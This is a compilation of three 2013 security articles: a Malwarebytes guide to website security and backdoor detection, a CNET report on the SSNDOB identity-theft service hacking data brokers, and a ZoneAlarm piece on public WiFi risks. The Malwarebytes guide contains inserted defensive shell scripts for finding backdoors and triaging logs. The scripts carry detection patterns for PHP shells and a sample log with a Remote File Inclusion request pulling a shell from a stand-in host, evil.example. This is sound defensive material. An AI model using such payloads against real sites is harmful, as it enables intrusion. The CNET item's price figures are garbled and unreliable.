Hacked !!!
Image by marsmet521
All images are copyrighted by their respective authors.
Item 1) A Guide to Website Security
Malwarebytes Unpacked, blog.malwarebytes.org/
[Image: Hacked!!! (cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/hack…)]
By Jerome Segura, June 17, 2013, in Malware Intelligence
blog.malwarebytes.org/intelligence/2013/06/a-guide-to-web…
Having your own website is hard enough. On top of adding content, trying to grow your audience and maintaining it, you now also have to worry about malware being spread through your beloved website.
According to Palo Alto Networks’s recent The Modern Malware Review, “90 percent of Unknown Malware [is] Delivered Via Web-Browsing.”
This confirms that most web-based infections fly under the radar for several hours/days before being detected by major antivirus products.
In our previous blog posts, we’ve discussed how web exploits affect end users’ machines and serve malicious payloads.
Let’s take a look behind the curtain on websites and web servers that house and serve malware and how to better protect your own website.
There are millions of websites and the process of getting your own is fairly trivial. Without a doubt the ease of deploying a website and relative low cost to own one is responsible for many of the security issues we face. While you may think of a website as a personal blog, e-commerce site or forum, the bad guys see it as a resource for many purposes:
• Hosting illegal/copyrighted files for free.
• Hosting malware, phishing and fake pharmaceutical pages.
• Sending spam (malware can run on a website just like it does on your desktop computer).
• Gaming Google’s SEO ranking algorithm by stuffing pages with backlinks.
• Performing Denial of Service attacks to knock other websites offline.
— Finding the flaw(s)
The dominant web server software is Apache, which runs on Linux. While there is a widely accepted belief that Linux is more secure than Windows, web servers are constantly hacked into by attackers ranging from script kiddies to professional pentesters.
Let’s review some of the most common reasons why websites get hacked:
— Stolen user credentials
You access your website by logging into a Control Panel or the login page of your favorite blogging software, such as WordPress. Occasionally, you may also use an FTP program to upload files. If malware is present on your computer, and it happens to be a keylogger or some other type of password stealer, everything you type, as well as your configuration files, can be harvested and sent back to the bad guys. Similarly, logging into your website from a free Wi-Fi hotspot or insecure access point exposes your password.
— Weak passwords
Many site owners keep the default “admin” username and choose a password that is easy to guess. Attackers take advantage of this with a technique known as a brute force attack, which consists of trying out hundreds of thousands of passwords until one matches. If you use a typical dictionary word or a cute pet name, you might as well give the bad guys the keys to your house.
— Software vulnerabilities
Websites run multiple software programs in order to render pages, store customer data, etc. If those are poorly configured or outdated, a multitude of bugs can be exploited by a remote attacker to gain access to the system.
— Dangerous configurations
A very important aspect of Linux security is file permissions. They are a double-edged sword: set properly, file permissions can make a site very secure, but set loosely they do the opposite. Many people do not understand permissions well or simply disable them altogether in order to install a plugin that complained about restrictions. You can read more about file permissions in this blog post.
A popular attack method that has allowed countless script kiddies to deface websites and spread malware is called Remote File Inclusion (RFI). It consists of tricking the web server into opening a remote file as if it resided locally, by passing specially crafted parameters in the URL. The remote file could be anything, but hackers will use scripts, also known as “shells” (more on that later), to gain access and perform administrative operations directly on the website.
— Owning the box
The ultimate goal of an attacker is to completely own the target system, something known as being root. Unless you possess the administrative credentials, your local user account has very restricted permissions which do not allow you to alter core parts of the website to do as you please. Once again, web servers have enough vulnerabilities to exploit to elevate a user’s privileges to root.
For the most part, attackers will reuse publicly available exploits, perhaps tweak them a little bit to add their signature or a message to their friends. Even exploits that are several years old still work, which shows one of the big issues with website security: lack of security maintenance. There is also some confusion between the hosting provider and its customers regarding the patching process. Some providers will not perform upgrades for you, especially if you install your own Content Management System (WordPress, Joomla!, Drupal). There are many reasons for that:
• The cost: When you only pay a few dollars a month for web site hosting, your provider is not going to waste its time and money troubleshooting your site.
• The responsibility: If performing an update on your site breaks the database or another critical part, this is a pretty big responsibility to assume. Your hosting company is not a web development studio.
The problem is that most website owners wrongly assume everything is taken care of or that a website is for some reason “immune” to security problems.
— Prevention goes a long way
• Only administer your website from a device you trust is free of malware. If you aren’t sure, why not run our Malwarebytes Anti-Malware program?
• Do not administer your site from a free Wi-Fi hotspot (i.e., your local Starbucks). If you must, please use a free or cheap VPN program to encrypt your connection.
• Keep your website up to date just like you would (or should) keep your computer patched up. If you use WordPress, the main dashboard will tell you when updates are available.
• If spending time to secure your site is not your cup of tea, you might want to pay a little more and use “managed hosting,” a turn-key solution where everything is taken care of for you.
• Use strong passwords and change them on a regular basis.
• Back up your site at least once a month.
For the more advanced users out there, let’s roll up our sleeves and dig deeper.
Web malware is quite different from what we see on the Windows platform. For one, there are many more scripts (as opposed to compiled binaries), which can be written in Perl, PHP, Python or simply in bash, the popular Unix shell language. Such scripts are also known as “backdoors” or “shells,” since once uploaded onto a website (for example using the Remote File Inclusion we discussed earlier), they allow unfettered remote access.
A popular shell known as C99 lets an attacker browse the entire website’s content directly from their browser:
[Image: !C99madshell v. 2.1 madset edition ADVANCED! (cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/shel…)]
Figure 1: C99 Shell: A Hacker’s Favorite
In addition, this shell lets you delete and add files, dump the database and even change file permissions.
In almost all cases involving a site hack, you will find a backdoor of some sort. It may not have a full graphical interface, but as long as it allows hackers remote access, that is more than enough to keep the site under their control. By nature, shells are very small in size and will try to hide in certain directories or, if that is not possible, will sit in folders that have more lax permissions, such as /images, simply because that was the easiest place to inject them.
— How to recognize a backdoor
— Accessing your files
If you are trying to hunt for malicious files, you will need to access your website’s internals. You can do so by FTP, SFTP or SSH. FTP is the old-school way of uploading files using a client like FileZilla or CuteFTP. I recommend using SFTP instead, which supports encryption (as opposed to sending out your login credentials in the clear with FTP). By far the best way to access your web server is using the command line terminal through SSH. Keep in mind that it requires a certain understanding of Linux commands and can seem a little overwhelming. Finally, you can of course browse your files using your web hosting company’s control panel (cPanel and Plesk, to name two).
[Image: Welcome, Demo Admin (cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/ples…)]
Figure 2: The Plesk Control Panel
— File name patterns/location
Although not a very reliable approach, searching for malicious shells by name can yield some good results. Many hackers will not bother renaming the backdoor they uploaded. So if you see a file called c99.php or r57.php (two very popular backdoors), you are pretty much guaranteed it is bad. Another trick the bad guys use is to rename those files with another extension such as “.txt,” so keep an eye open for those as well (e.g., c99.php.txt, r57.php.txt).
Looking at folders where plugins or images normally reside can be quite revealing if you search for files that have no business being in there.
[Image: Index of /images/uploaded_images (cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/c99.png)]
Figure 3: A Backdoor Hiding Among Images
— File modification date
If your site was hacked recently but was fine, say, a month ago, then you have something to work with: time stamps. Look for any file added or modified recently and treat it as suspicious.
— File permissions/ownership
As we talked about earlier, file permissions and ownership are crucial to keeping a website secure. At the same time, many backdoors that are uploaded will often show with unusual attributes or attributes that are once again “out of place” with other files around them. So if you see a file with “777” permissions, it should instantly raise a red flag. Please refer to this article to learn more about file permissions and ownership.
— File contents
A much more powerful method to identify backdoors is to search for patterns and strings within the files themselves. That is where knowledge of Linux commands such as grep comes into play. This, of course, relies on having a list of malicious strings or patterns that is kept up to date. In many ways, you could compare that to antivirus signatures and a malware database.
[Image: $auth_pass (cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/file…)]
Figure 4: Yet Another Backdoor Called FilesMan
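Putting the name, location, attribute and content indicators above together, here is an added example (not code from the Malwarebytes post) of a read-only triage sweep over a web root, written for a Linux host with GNU find and grep. The folder names (/images, /uploads), the 30-day window and the content signatures ($auth_pass from Figure 4, eval() around a decoder) are assumptions to adjust for your own site.

```shell
#!/bin/sh
# Added example, not code from the article: a read-only triage sweep over a web
# root applying the indicators the article lists (name, location, permissions and
# recency, contents). Assumes a Linux host with GNU find and grep. Nothing is
# deleted or changed; every hit is printed with a tag for manual review.

# Well-known shell names, with or without the ".txt" extension trick.
flag_names() {
    find "$1" -type f \( -iname 'c99.php' -o -iname 'r57.php' \
        -o -iname 'c99.php.txt' -o -iname 'r57.php.txt' \) -printf 'NAME  %p\n'
}

# PHP scripts sitting in folders that should only hold images or uploads
# (the folder names are an assumption; adjust them to your site).
flag_location() {
    find "$1" -type f \( -ipath '*/images/*' -o -ipath '*/uploads/*' \) \
        -iname '*.php*' -printf 'PLACE %p\n'
}

# World-writable files ("777"-style) and PHP files modified in the last N days.
flag_attributes() {
    days="${2:-30}"
    find "$1" -type f -perm -0002 -printf 'PERM  %m %p\n'
    find "$1" -type f -iname '*.php*' -mtime "-$days" -printf 'MTIME %TY-%Tm-%Td %p\n'
}

# Files whose contents carry strings typical of PHP backdoors: the $auth_pass
# variable of FilesMan (Figure 4) and eval() wrapped around a decoder. The
# pattern list is a starting point, not a complete signature database.
flag_contents() {
    grep -rlE --include='*.php*' \
        '\$auth_pass|eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)' \
        "$1" | sed 's/^/CONT  /'
}

# Run every check over the web root; the output is a sorted, tagged list of paths.
scan_webroot() {
    {
        flag_names "$1"
        flag_location "$1"
        flag_attributes "$1" "${2:-30}"
        flag_contents "$1"
    } | sort -u
}

# Usage: scan_webroot /var/www/html 30
```

A file can appear under several tags (a 777 c99.php.txt in /images hits all four), which is exactly the kind of file to look at first.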
— Log analysis
When all else fails, log analysis can be your best friend. Think of log files as the black box investigators recover to find out more about an accident. Logs contain traces of all events that happened on your website, sorted out by timestamp. There are two types of logs often mentioned: Apache’s access and error logs. Every time someone visits a page on your site, a record is created in your Apache’s access logs. The error logs show entries for commands that resulted in an error, often indicating malicious activity, such as trying to brute force a login page or performing a hack. As you may imagine, log files can get really large, which makes searching them a real pain. There are tools such as OSSEC that make this process a little easier.
If you are using your web host’s control panel, the logs may be located as illustrated below.
[Image: Folders (cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/logs…)]
Figure 5: Control Panel Showing Apache Logs
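As an added example (not from the original post), here is a first pass over an Apache access log in the combined format for three things the article ties to a hack: the Remote File Inclusion attempts described earlier (a remote URL in the query string), scripts being called from an images folder, and login brute forcing. The log lines are constructed for the example, with documentation IP addresses and a made-up evil.example host; the brute-force threshold and the wp-login.php path are assumptions.

```shell
#!/bin/sh
# Added example, not code from the article: grep/awk triage of an Apache access
# log (combined format). Assumes a Linux host; the sample log below is constructed.

# Requests whose query string points at another site (http:// or https:// after
# "?", possibly URL-encoded): the hallmark of a Remote File Inclusion attempt.
rfi_attempts() {
    grep -E '"[A-Z]+ [^" ]*\?[^" ]*=https?(%3A|:)' "$1"
}

# Any request for a .php file under /images/ or /uploads/, where scripts have
# no business being (folder names are an assumption; adjust to your site).
script_in_images() {
    grep -Ei '"[A-Z]+ [^" ]*/(images|uploads)/[^" ]*\.php' "$1"
}

# Client IPs with more than N POSTs to the login page: brute-force candidates.
# Prints "<count> <ip>" per offender; the threshold defaults to 10.
login_bruteforce() {
    threshold="${2:-10}"
    awk -v t="$threshold" '$6 == "\"POST" && $7 ~ /wp-login\.php/ { n[$1]++ }
        END { for (ip in n) if (n[ip] > t) print n[ip], ip }' "$1"
}

# Constructed sample log (not a real capture) written to "$1" so the checks
# can be tried offline: one normal visit, one RFI attempt, one call to a shell
# in /images, twelve rapid login POSTs from one IP and one legitimate login.
write_sample_log() {
    {
        printf '198.51.100.7 - - [20/Jun/2013:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"\n'
        printf '203.0.113.9 - - [20/Jun/2013:10:00:05 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 2048 "-" "libwww-perl/5.8"\n'
        printf '203.0.113.9 - - [20/Jun/2013:10:01:10 +0000] "POST /images/uploaded_images/c99.php?act=ls HTTP/1.1" 200 9876 "-" "Mozilla/4.0"\n'
        i=0
        while [ "$i" -lt 12 ]; do
            printf '203.0.113.5 - - [20/Jun/2013:10:02:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "python-requests/1.2"\n' "$i"
            i=$((i + 1))
        done
        printf '198.51.100.7 - - [20/Jun/2013:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"\n'
    } > "$1"
}

# Usage: rfi_attempts /var/log/apache2/access.log; login_bruteforce access.log 20
```

The RFI and shell hits give you the timestamp and client IP to pivot on, and the same file path then becomes the first thing to look for in the web root.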
— Full website compromise
Injecting a backdoor on your site is just the first step in a long chain of events. Once attackers control your server, they will want to carry out some sort of action. Note that most (if not all) site compromises are automated, meaning there is no human sitting at a terminal hacking your particular site: automated scripts are constantly probing the wire to hack anything that is vulnerable.
As mentioned before, your website can be leveraged to do all sorts of things. Let’s take a look at some of the most common motives and how it is done.
— Spam (AKA pharma hack)
It seems spam is here for the long haul. Few people know that pharmaceutical spam also affects websites. While it may not be visible to site owners, pharma spam is definitely found by search engines. All of a sudden, your website is pushing fake drugs and other dubious products. Not only is this going to use up a lot of bandwidth, it will put the website on Google’s blacklist, with all the resulting consequences for search rankings.
Item 2) Hackers crack major data firms, sell info to ID thieves, says report
CNET, news.cnet.com/
An illegal, hacker-helmed identity-theft service called SSNDOB — as in Social Security Number and date of birth — compromises servers at several major US data brokers, according to a report.
by Edward Moyer | September 25, 2013 12:27 PM PDT
news.cnet.com/8301-1009_3-57604633-83/hackers-crack-major…
An illegal service that sells personal data “on any U.S. resident” — which can then be used for identity theft — hacked into servers at several major data aggregators including LexisNexis and Dun & Bradstreet, according to a report.
The service’s customers have, the report said, “spent hundreds of thousands of dollars looking up SSNs, birthdays, driver’s license records, and obtaining unauthorized credit and background reports on more than 4 million Americans.”
In an article Wednesday, former Washington Post reporter Brian Krebs, who now writes the KrebsOnSecurity blog, outlined how a site called Expose.su managed earlier this year to post financial information on celebrities and government officials.
[Image: Security8 (asset0.cbsistatic.com/cnwk.1d/i/tim2/2013/09/25/Security8…)]
The site’s activities triggered an FBI investigation, in part because Expose.su managed to publish the Social Security Number, address, and a credit report of then-FBI Director Robert Mueller.
According to Krebs, Expose.su (think “exposes you”) got its info from another site, ssndob.ms, or SSNDOB (think “Social Security Number” and “date of birth”), which got the data by way of a small botnet it operates. The botnet appears to have access to compromised servers at several large data brokers in the United States, including LexisNexis, Dun & Bradstreet, and Kroll Background America. (And, in regard to the bot program installed on the hacked servers, Krebs reported that “none of the 46 top antimalware tools on the market today detected it as malicious.”)
LexisNexis maintains one of the world’s biggest electronic databases for legal and public-records related information; Dun & Bradstreet licenses info on businesses for use in credit decisions; and Kroll — now a part of HireRight — provides services related to employment background, drug, and health screenings, Krebs noted.
“All three victim companies said they are working with federal authorities and third-party forensics firms in the early stages of determining how far the breaches extend, and whether indeed any sensitive information was accessed and exfiltrated from their networks,” Krebs said.
Krebs, who got his hands on a copy of SSNDOB’s database, reported that a closer examination of it indicates that since SSNDOB came on the scene early last year, the service has sold more than 1.02 million unique SSNs and nearly 3.1 million date of birth records.
SSNDOB markets itself on underground cybercrime forums, Krebs said, and sells data at prices that “range from 50 cents to .50 per record, and from to for credit and background checks.
Customers pay for their subscriptions using largely unregulated and anonymous virtual currencies, such as Bitcoin and WebMoney.” Krebs also said SSNDOB appears “to have licensed its system for use by at least a dozen high-volume users” and that there’s some evidence these users “are operating third-party identity theft services.”
The FBI confirmed that a bureau investigation into the SSNDOB server hacks is ongoing, Krebs reported, adding that a spokesperson wouldn’t provide any details.
You can read Krebs’ story here.
Item 3) The Risks of Public Hotspots: How Free WiFi Can Harm You
ZoneAlarm Security Blog, www.zonealarm.com/blog/, Secure Your Online World
[Image: Risks of Public WiFi (www.zonealarm.com/blog/wp-content/uploads/2013/11/Risks-o…)]
Posted on November 20, 2013 by ZoneAlarm
www.zonealarm.com/blog/2013/11/the-risks-of-public-hotspo…
Practically anywhere you go, you’ll come across public WiFi hotspots. However, this free service could spell trouble. We explore the security risks of public hotspots and what to consider before connecting to public WiFi.
[Image: Risks of Public WiFi infographic (www.zonealarm.com/blog/wp-content/uploads/2013/11/ZoneAla…)]
* = Turn on two-factor authentication for your accounts
• How to Turn on Two-factor Authentication for Your Email Accounts
• How to Turn on Login Approvals on Facebook
• How to Turn on Two-step Verification for Your LinkedIn Account